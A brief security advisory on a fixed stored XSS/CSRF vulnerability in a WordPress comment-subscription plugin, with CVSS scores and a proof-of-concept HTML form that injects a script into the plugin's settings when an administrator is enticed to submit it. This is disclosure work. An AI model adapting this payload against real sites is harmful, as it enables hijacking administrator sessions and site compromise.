CVSS Summary
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
Last revised:
This plugin contains a combination XSS/CSRF vulnerability. Because the XSS is stored, browsers like Chrome which implement anti-XSS measures are equally at risk.
Current state: Fixed
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
Entice an administrative user to submit the following form:
<form action="http://localhost/wp-admin/admin.php?page=subscribe-to-comments-reloaded/options/index.php&subscribepanel=3" method="post"> <input type="text" name="options[manager_page]" id="manager_page" value=""><script>alert(1)</script>"> <input type="submit"> </form>
An alert will be displayed on this plugin’s settings page.
Upgrade immediately.